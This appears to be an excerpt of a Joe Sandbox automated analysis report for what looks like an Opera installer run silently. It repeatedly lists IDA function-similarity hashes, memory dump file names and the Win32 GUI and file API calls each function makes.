                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                            • String ID: H'D${
                                                                                                                                                                            • API String ID: 590372296-3538427676
                                                                                                                                                                            • Opcode ID: 570833faf529d1e68f6cd33d533d4b4f7643f176c4e3a8f9582153ded90dbe4e
                                                                                                                                                                            • Instruction ID: a946544cda80648ae215d749a1304cfc675a42e6d6c1d5f97ef9608d1157b9e3
                                                                                                                                                                            • Opcode Fuzzy Hash: 570833faf529d1e68f6cd33d533d4b4f7643f176c4e3a8f9582153ded90dbe4e
                                                                                                                                                                            • Instruction Fuzzy Hash: 0DB16770800608FFDF11AFA0DD859AE3B78EB48354F10413AFA45BA1A0D7785A41DF69
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 004050A6
                                                                                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 004050B1
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 004050FB
                                                                                                                                                                            • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00405112
                                                                                                                                                                            • SetWindowLongW.USER32(?,000000FC,0040569B), ref: 0040512B
                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040513F
                                                                                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405151
                                                                                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00405167
                                                                                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405173
                                                                                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405185
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00405188
                                                                                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 004051B3
                                                                                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 004051BF
                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040525A
                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040528A
                                                                                                                                                                              • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040529E
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004052CC
                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004052DA
                                                                                                                                                                            • ShowWindow.USER32(?,00000005), ref: 004052EA
                                                                                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 004053E5
                                                                                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040544A
                                                                                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040545F
                                                                                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405483
                                                                                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004054A3
                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 004054B8
                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 004054C8
                                                                                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405541
                                                                                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 004055EA
                                                                                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055F9
                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00405624
                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00405672
                                                                                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 0040567D
                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00405684
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                            • String ID: $M$N
                                                                                                                                                                            • API String ID: 2564846305-813528018
                                                                                                                                                                            • Opcode ID: 34fa74ef7f2c8ae10774f757d898aea139b191b20b2690d18c4730151a5bece5
                                                                                                                                                                            • Instruction ID: 154044203e87ae86578454b6b14b757097bfc819611b9ce4677548c75e4aac0f
                                                                                                                                                                            • Opcode Fuzzy Hash: 34fa74ef7f2c8ae10774f757d898aea139b191b20b2690d18c4730151a5bece5
                                                                                                                                                                            • Instruction Fuzzy Hash: D8028D70900609AFDB20DFA5CD85AAF7BB5FB45314F10857AF910BA2E1D7B98A41CF18
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040415E
                                                                                                                                                                            • ShowWindow.USER32(?), ref: 0040417E
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404190
                                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 004041A9
                                                                                                                                                                            • DestroyWindow.USER32 ref: 004041BD
                                                                                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 004041D6
                                                                                                                                                                            • GetDlgItem.USER32(?,?), ref: 004041F5
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404209
                                                                                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00404210
                                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 004042BB
                                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 004042C5
                                                                                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 004042DF
                                                                                                                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404330
                                                                                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 004043D6
                                                                                                                                                                            • ShowWindow.USER32(00000000,?), ref: 004043F7
                                                                                                                                                                            • EnableWindow.USER32(?,?), ref: 00404409
                                                                                                                                                                            • EnableWindow.USER32(?,?), ref: 00404424
                                                                                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040443A
                                                                                                                                                                            • EnableMenuItem.USER32(00000000), ref: 00404441
                                                                                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404459
                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040446C
                                                                                                                                                                            • lstrlenW.KERNEL32(00442748,?,00442748,00000000), ref: 00404496
                                                                                                                                                                            • SetWindowTextW.USER32(?,00442748), ref: 004044AA
                                                                                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 004045DE
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
                                                                                                                                                                            • String ID: H'D
                                                                                                                                                                            • API String ID: 1860320154-716976774
                                                                                                                                                                            • Opcode ID: 9939712a446ab727087054d1c74408c37dfd1bc10aee081f917b5745ceaee613
                                                                                                                                                                            • Instruction ID: 87935a59af8161b0f78328c19d4fe10c51b4425a276279a6d07330ead90e7465
                                                                                                                                                                            • Opcode Fuzzy Hash: 9939712a446ab727087054d1c74408c37dfd1bc10aee081f917b5745ceaee613
                                                                                                                                                                            • Instruction Fuzzy Hash: C4C1C2B1500604BBCB216F61EE85E2B3BA8FB85745F11097EFB41B11F0DB7998419B2E
                                                                                                                                                                            APIs
                                                                                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040487E
                                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 00404892
                                                                                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004048AF
                                                                                                                                                                            • GetSysColor.USER32(?), ref: 004048C0
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048CE
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048DC
                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 004048E1
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048EE
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404903
                                                                                                                                                                            • GetDlgItem.USER32(?,0000040A), ref: 0040495C
                                                                                                                                                                            • SendMessageW.USER32(00000000), ref: 00404963
                                                                                                                                                                            • GetDlgItem.USER32(?,000003E8), ref: 0040498E
                                                                                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049D1
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 004049DF
                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 004049E2
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 004049FB
                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 004049FE
                                                                                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404A2D
                                                                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404A3F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                            • String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0$N$WG@
                                                                                                                                                                            • API String ID: 3103080414-88766510
                                                                                                                                                                            • Opcode ID: b01416c62338905acfc632b3e745d4ba8895ca3ce3da3a804f9e2edfaf49b693
                                                                                                                                                                            • Instruction ID: 519c373e7f185e7fda66e670232f02753279bd673d39c82729c50cf19e81ba39
                                                                                                                                                                            • Opcode Fuzzy Hash: b01416c62338905acfc632b3e745d4ba8895ca3ce3da3a804f9e2edfaf49b693
                                                                                                                                                                            • Instruction Fuzzy Hash: 6461B3B1A40209BFDF10AF60CD85A6A7B79FB84304F00843AFA15B62D0D779A951CF99
                                                                                                                                                                            APIs
                                                                                                                                                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                            • DrawTextW.USER32(00000000,00464260,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                            • String ID: F
                                                                                                                                                                            • API String ID: 941294808-1304234792
                                                                                                                                                                            • Opcode ID: fed5d4dc3d325cae90a53ae0d2fcb83d70f3ae94d69320437858ee33f07fdf71
                                                                                                                                                                            • Instruction ID: dda4e0b8355a10cf3a4659add9ec42a83d374e9472f600803517c33aed587cab
                                                                                                                                                                            • Opcode Fuzzy Hash: fed5d4dc3d325cae90a53ae0d2fcb83d70f3ae94d69320437858ee33f07fdf71
                                                                                                                                                                            • Instruction Fuzzy Hash: 96418A71804209AFCF058FA5DE459BFBBB9FF45314F00802EF991AA1A0C7749A55DFA4
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404B61
                                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404B8B
                                                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404C3C
                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404C47
                                                                                                                                                                            • lstrcmpiW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00442748,00000000,?,?), ref: 00404C79
                                                                                                                                                                            • lstrcatW.KERNEL32(?,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0), ref: 00404C85
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C97
                                                                                                                                                                              • Part of subcall function 00405CE6: GetDlgItemTextW.USER32(?,?,00002000,00404CCE), ref: 00405CF9
                                                                                                                                                                              • Part of subcall function 00406950: CharNextW.USER32(?,*?|<>/":,00000000,004BD000,74DF3420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069B3
                                                                                                                                                                              • Part of subcall function 00406950: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069C2
                                                                                                                                                                              • Part of subcall function 00406950: CharNextW.USER32(?,004BD000,74DF3420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069C7
                                                                                                                                                                              • Part of subcall function 00406950: CharPrevW.USER32(?,?,74DF3420,004D1000,00000000,00403640,004D1000,004D1000,0040394F,?,00000008,0000000A,0000000C), ref: 004069DA
                                                                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(00432718,?,?,0000040F,?,00432718,00432718,?,00000001,00432718,?,?,000003FB,?), ref: 00404D5A
                                                                                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D75
                                                                                                                                                                              • Part of subcall function 00404ECE: lstrlenW.KERNEL32(00442748,00442748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F6F
                                                                                                                                                                              • Part of subcall function 00404ECE: wsprintfW.USER32 ref: 00404F78
                                                                                                                                                                              • Part of subcall function 00404ECE: SetDlgItemTextW.USER32(?,00442748), ref: 00404F8B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                            • String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0$A$H'D
                                                                                                                                                                            • API String ID: 2624150263-4075856908
                                                                                                                                                                            • Opcode ID: a3fe85cda2bd1e3b216b6d9087c51d3bdf9f40a25cc22ec4f2908b689d4934be
                                                                                                                                                                            • Instruction ID: 631ab75ceab9e691d6259a87645379c0ec27aba7f5179a8718d2cd07d5d9f082
                                                                                                                                                                            • Opcode Fuzzy Hash: a3fe85cda2bd1e3b216b6d9087c51d3bdf9f40a25cc22ec4f2908b689d4934be
                                                                                                                                                                            • Instruction Fuzzy Hash: 52A1A3B1900209ABDB11AFA5CD81AEF77B8FF84754F11843BF601B62D1DB7C89418B69
                                                                                                                                                                            APIs
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406483,?,?), ref: 00406323
                                                                                                                                                                            • GetShortPathNameW.KERNEL32(?,0045ADE8,00000400), ref: 0040632C
                                                                                                                                                                              • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
                                                                                                                                                                              • Part of subcall function 004060F7: lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
                                                                                                                                                                            • GetShortPathNameW.KERNEL32(?,0045B5E8,00000400), ref: 00406349
                                                                                                                                                                            • wsprintfA.USER32 ref: 00406367
                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,0045B5E8,C0000000,00000004,0045B5E8,?,?,?,?,?), ref: 004063A2
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004063B1
                                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063E9
                                                                                                                                                                            • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,0045A9E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040643F
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00406450
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406457
                                                                                                                                                                              • Part of subcall function 00406192: GetFileAttributesW.KERNEL32(00000003,00403138,004D9000,80000000,00000003), ref: 00406196
                                                                                                                                                                              • Part of subcall function 00406192: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                            • String ID: %ls=%ls$[Rename]
                                                                                                                                                                            • API String ID: 2171350718-461813615
                                                                                                                                                                            • Opcode ID: 54cf7ae50ddf40535992a726cd06f9f81a4a0a47f0cb7f2e08aac5df862df744
                                                                                                                                                                            • Instruction ID: 026d517b253a5d6ccbe57f845948a58d3e37c3b70aabf831ebb2f23b3e620644
                                                                                                                                                                            • Opcode Fuzzy Hash: 54cf7ae50ddf40535992a726cd06f9f81a4a0a47f0cb7f2e08aac5df862df744
                                                                                                                                                                            • Instruction Fuzzy Hash: 14312370600315BBD2207F659D49F6B3A6CDF41759F12403AFA02F62D3EA7C982986BD
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00002000), ref: 00406801
                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00002000,00000000,0043A728,?,?,00000000,00000000,00000000,00000000), ref: 00406817
                                                                                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0), ref: 00406875
                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 0040687E
                                                                                                                                                                            • lstrcatW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,\Microsoft\Internet Explorer\Quick Launch,00000000,0043A728,?,?,00000000,00000000,00000000,00000000), ref: 004068A9
                                                                                                                                                                            • lstrlenW.KERNEL32("C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,00000000,0043A728,?,?,00000000,00000000,00000000,00000000), ref: 00406903
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000001A.00000002.2705034124.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 0000001A.00000002.2704996397.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705066622.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705099216.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            • Associated: 0000001A.00000002.2705273053.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_26_2_400000_ya.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                            • String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                            • API String ID: 4024019347-1466120327
                                                                                                                                                                            • Opcode ID: 9e3b55293402a094a689701159d9a6112b8f3c4007e64e8ac0521a09e1289eeb
                                                                                                                                                                            • Instruction ID: 81e951f8fe173c1ecdb7e664093ca8164433b695446651b9203bd6f4f8051ee3
                                                                                                                                                                            • Opcode Fuzzy Hash: 9e3b55293402a094a689701159d9a6112b8f3c4007e64e8ac0521a09e1289eeb
                                                                                                                                                                            • Instruction Fuzzy Hash: 5B6145B2A053019BEB20AF65DC8472B77D4AF45314F25453FF583B22D0EA7C8960876E
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 004046A5
                                                                                                                                                                            • GetSysColor.USER32(00000000), ref: 004046E3
                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 004046EF
                                                                                                                                                                            • SetBkMode.GDI32(?,?), ref: 004046FB
                                                                                                                                                                            • GetSysColor.USER32(?), ref: 0040470E
                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 0040471E
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00404738
                                                                                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404742
